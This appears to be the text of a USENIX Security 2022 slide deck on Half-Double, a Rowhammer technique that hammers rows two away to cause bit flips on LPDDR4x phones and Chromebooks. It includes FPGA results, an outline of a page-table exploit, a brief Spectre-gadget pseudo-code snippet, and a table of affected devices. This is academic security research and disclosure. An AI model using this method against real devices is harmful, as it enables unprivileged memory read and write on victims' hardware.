## Half-Double: Hammering From the Next Row Over

**USENIX Security 2022** 

12th August 2022







Andreas Kogler

Graz University of Technology

Yoongu Kim

Google

Fric Shin

Rivos

Jonas Juffinger

Graz University of Technology, Lamarr

Moritz Lipp Amazon Web Services

Mattias Nissler

Google

Salman Qazi

Google

Nicolas Boichat

Google

Daniel Gruss

Graz University of Technology

#### Motivation



#### Rowhammer

- Default refresh window of 64 ms
- Error Correting Code (ECC)
  - Correct only one flip
- Targeted Row Refresh (TRR)
  - Refresh direct neighbours hammering rows
  - Exhaustion with multi-sided patterns [2, 1]
- Would perfect TRR fix Rowhammer attacks?

#### **Observed Flips**



- Short answer: No
- Hammering with three rows between the aggressors
  - Causes flips on LPDDR4x commodity devices
  - 5 out of 7 mobile devices affected
  - With active TRR and on-chip ECC
- Is this *Distance-2* Rowhammer?
- What is the root cause?

#### **FPGA Experiments**

| Far Aggressor  | $(\mathcal{F}_+)$   |
|----------------|---------------------|
| Near Aggressor | $(\mathcal{N}_+)$   |
| Victim         | (V)                 |
| Near Aggressor | $(\mathcal{N}_{-})$ |
| Far Aggressor  | $(\mathcal{F}_{-})$ |
|                |                     |

- FPGA setup
  - Control DIMM via FPGA
  - Full control over the refreshes
  - Deactivated TRR
  - No need for data retention

#### **FPGA Experiments - Distance 1**



#### Distance-1

- $(\mathcal{N}_+ \to \mathcal{N}_-)^{\infty}$
- Classic double-sided Rowhammer
- **First** flip after:
  - 18 000 hammers in 1.2 ms
  - ✓ Within the refresh window
  - Mitigated by TRR

#### **FPGA Experiments - Distance 2**



- Distance-2
  - $(\mathcal{F}_+ \to \mathcal{F}_-)^{\infty}$
  - Distance two double-sided Rowhammer
- First flip after:
  - 4 000 000 hammers in 270 ms
  - X Not within the refresh windows

#### **FPGA Experiments - Half-Double**

| $(\mathcal{F}_+)$   |
|---------------------|
| $(\mathcal{N}_+)$   |
| $(\mathcal{V})$     |
| $(\mathcal{N}_{-})$ |
| $(\mathcal{F}_{-})$ |
|                     |

#### • Half-Double

- $((\mathcal{F}_+ \to \mathcal{F}_-)^\beta \to \mathcal{N}_+ \to \mathcal{N}_-)^\infty$
- Many distance-2 accesses with a few distance-1 accesses
- First flip after:
  - 296 960 hammers in 20 ms
  - Dilution  $\beta = 57$  (5120 distance-1 accesses)
  - ✓ Within the refresh window
  - ✓ Assisted by TRR
- ullet Attacker  $o \mathcal{F}$
- TRR  $\rightarrow \mathcal{N}$

Exploitable in the Wild?

#### **End-to-End Exploit - Overview**



- Target PFN in Page Table Entry [3]
- C1: Allocation of Contiguous Memory
- C2: Alternative to Memory Templating
- C3: Memory Massaging
- C4: Bit-Flip Verification

#### C1 - Allocation of Contiguous Memory

$$X_0 = b_8$$

$$\mathbf{X}_1=b_{12}\oplus b_{16}$$

$$\mathbf{X}_2=b_{13}\oplus b_{17}$$

$$\mathbf{X}_3=b_{14}\oplus b_{18}$$

- Mapping from virtual to physical addresses
- DRAM addressing function
- Mapping physical address to 16 DRAM banks
- **Specific** bank access pattern if contiguous memory
- ✓ Extract pattern with a timing side channel



### C2 & C3 - Memory Templating & Memory Massaging



- Skip templating
- Spray page tables
- Hammer with Half-Double

#### C4 - Bit-Flip Verification

• Corrupt page table entries can kill the attacker process

```
if ( /*misprediction*/ ) {
    access(probe + (*ptr & 1));
}
if ( is_cached(probe) ) {
    // ptr[0-4] valid
}
```

- Verify if address save to access
- Spectre gadget
- ullet Cached o accessible
- Suppresses corruption faults

#### **End-to-End Exploit - Timings**



- 45 minutes (Chromebook<sub>2</sub>)
- Full memory read & write primitive
- Deployable inside an APP

#### Final Remarks



- Open Source Thttps://github.com/IAIK/halfdouble
- Passed artifact evaluation



- More details
  - Dance-experiments Paper
     Contiguous Transport
  - Contiguous me the so solver
    Physical pead but recovery
    ... Read but recovery

#### References i

- [1] Pietro Frigo, Emanuele Vannacci, Hasan Hassan, Victor van der Veen, Onur Mutlu, Cristiano Giuffrida, Herbert Bos, and Kaveh Razavi. TRRespass: Exploiting the Many Sides of Target Row Refresh. In: S&P. 2020.
- [2] Finn de Ridder, Pietro Frigo, Emanuele Vannacci, Herbert Bos, Cristiano Giuffrida, and Kaveh Razavi. SMASH: Synchronized Many-sided Rowhammer Attacks From JavaScript. In: USENIX Security Symposium. 2021.
- [3] Mark Seaborn and Thomas Dullien. Test DRAM for bit flips caused by the rowhammer problem. Retrieved on July 27, 2015. 2015. URL: https://github.com/google/rowhammer-test.

# Additonal Slides

#### **Affected Devices**



- Tested 13 DIMMs & devices
- 2 DIMMs affected
  - FPGA analysis
  - Exact numbers
- 5 out of 7 mobile devices affected
  - Reversed addressing
  - Unprivileged flush
  - Uncachable memory (10x)

#### Affected Devices - Flip Numbers

| System                  | RAM     | <b>N</b> <sub>Hammers</sub> | $UC_{0	o 1}$ | $UC_{1	o 0}$ | $\textbf{Flush}_{0 \rightarrow 1}$ | $\textbf{Flush}_{1\to 0}$ |
|-------------------------|---------|-----------------------------|--------------|--------------|------------------------------------|---------------------------|
| $Chromebook_1$          | LPDDR4x | 23 274                      | 27           | 40           | 2                                  | 5                         |
| Chromebook <sub>2</sub> | LPDDR4x | 23 586                      | 235          | 2379         | 12                                 | 101                       |
| OnePlus 5T              | LPDDR4x | 25 687                      | 2            | 30           | 1                                  | 24                        |
| Pixel 3                 | LPDDR4x | 32 921                      | 11           | 5            | 0                                  | 0                         |
| HTC U11                 | LPDDR4x | 21 840                      | -            | -            | 3                                  | 17                        |